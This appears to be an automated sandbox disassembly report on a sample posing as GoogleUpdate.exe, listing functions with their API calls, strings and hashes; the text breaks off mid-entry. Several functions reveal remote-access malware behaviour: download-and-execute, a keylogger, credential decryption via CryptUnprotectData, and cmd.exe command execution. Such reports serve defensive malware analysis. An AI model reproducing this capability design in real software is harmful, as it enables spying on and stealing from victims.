waveInStart.WINMM ref: 00401CDE

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
Opcode Fuzzy Hash: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E

Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044C543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
_free.LIBCMT ref: 0044C59F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
Opcode Fuzzy Hash: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8

Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
int.LIBCPMT ref: 0040FBE8

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040FC28
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8

Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
_free.LIBCMT ref: 004457E3
_free.LIBCMT ref: 0044580A
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DBB4

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044DBC6
_free.LIBCMT ref: 0044DBD8
_free.LIBCMT ref: 0044DBEA
_free.LIBCMT ref: 0044DBFC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C

Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6

Strings

C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 0040651D, 00406645
open, xrefs: 004064CC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$open
API String ID: 2825088817-3723853980
Opcode ID: 408c0e2c66d40059f3ccb787a02c8382ad0dc41b5b863402b7e3ab549d603746
Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
Opcode Fuzzy Hash: 408c0e2c66d40059f3ccb787a02c8382ad0dc41b5b863402b7e3ab549d603746
Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B

Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C

Strings

[regsplt], xrefs: 00412608

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 8708e01ee449fd305a71b4056e7db3d63c1d920d9917d504d40d245cf41daf0f
Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
Opcode Fuzzy Hash: 8708e01ee449fd305a71b4056e7db3d63c1d920d9917d504d40d245cf41daf0f
Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8

Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00442C15
__freea.LIBCMT ref: 00442C9B

Strings

H"G, xrefs: 00442B40, 00442B60, 00442B89, 00442C65, 00442C83
H"GH"G, xrefs: 00442B5D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: H"G$H"GH"G
API String ID: 1635606685-3036711414
Opcode ID: 54c5712f20b3b570914cef82e111ba4a5148cfaa71e7a23ac689d4b8bfc24f49
Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
Opcode Fuzzy Hash: 54c5712f20b3b570914cef82e111ba4a5148cfaa71e7a23ac689d4b8bfc24f49
Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E

Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B

_wcslen.LIBCMT ref: 00419744

Strings

.exe, xrefs: 00419696
program files (x86)\, xrefs: 0041973E
program files\, xrefs: 0041972A, 00419731, 00419743

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$program files (x86)\$program files\
API String ID: 3286818993-1203593143
Opcode ID: 86729fe019a23bc556b69f726f0ebb4809113869e7e910a47738a92f1b0ca9da
Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
Opcode Fuzzy Hash: 86729fe019a23bc556b69f726f0ebb4809113869e7e910a47738a92f1b0ca9da
Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9

Function 0040A0B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
wsprintfW.USER32 ref: 0040A13F

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

], xrefs: 0040A0CC
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A0C7

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 41a020b40271810fca9afcffff3f4e02382fdafe0505e2b5479bf2d94888a367
Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
Opcode Fuzzy Hash: 41a020b40271810fca9afcffff3f4e02382fdafe0505e2b5479bf2d94888a367
Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9

Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF

Strings

Online Keylogger Started, xrefs: 00409E4C, 00409E55, 00409E7F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 86dbd2ede10dcdaea0f387c1138916226ec1cb0004849d923c05056a418c9c0b
Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
Opcode Fuzzy Hash: 86dbd2ede10dcdaea0f387c1138916226ec1cb0004849d923c05056a418c9c0b
Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE

Function 00448107 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,00452FD6,00000000), ref: 0044815D
GetLastError.KERNEL32(?,00000000,?,00452FD6,00000000), ref: 00448167
__dosmaperr.LIBCMT ref: 00448192

Strings

/j, xrefs: 00448121

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: /j
API String ID: 2583163307-1531585719
Opcode ID: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
Instruction ID: bc407199021615a177a746a92b253f91ed1213c20eb266450d42f323bf4fb8fa
Opcode Fuzzy Hash: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
Instruction Fuzzy Hash: 05014932A011641AF7247375A845B7F67494B81778F26026FFD0D8B2E2DF6C8C83815D

Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
GetProcAddress.KERNEL32(00000000), ref: 00406097

Strings

crypt32, xrefs: 0040608B
CryptUnprotectData, xrefs: 00406086

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794

Function 00418CCD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2

Strings

alarm.wav, xrefs: 00418CDD
x(G, xrefs: 00418CFC
P0F, xrefs: 00418D01

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: P0F$alarm.wav$x(G
API String ID: 1174141254-3464520750
Opcode ID: f11ea016c6a2c2bc35a45c8576492c2ff566f7a4dbbfb1194511a6f4b61926ae
Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
Opcode Fuzzy Hash: f11ea016c6a2c2bc35a45c8576492c2ff566f7a4dbbfb1194511a6f4b61926ae
Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF

Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
CloseHandle.KERNEL32(?), ref: 004051AA
SetEvent.KERNEL32(?), ref: 004051B9

Strings

Connection Timeout, xrefs: 00405178

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0fe5635f683795d8cfe0579df31b5987a28acbd550c3129ce8b44c2f0693b938
Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
Opcode Fuzzy Hash: 0fe5635f683795d8cfe0579df31b5987a28acbd550c3129ce8b44c2f0693b938
Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49

Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E

Strings

ios_base::failbit set, xrefs: 0040D240
ios_base::eofbit set, xrefs: 0040D24D
ios_base::badbit set, xrefs: 0040D21A

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F

Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B

Strings

/C , xrefs: 00414859
open, xrefs: 00414875
cmd.exe, xrefs: 00414870

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 200560daae6b7c2951921310a9a850d73dd86d63f9695ecaabf21497659b4c2f
Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
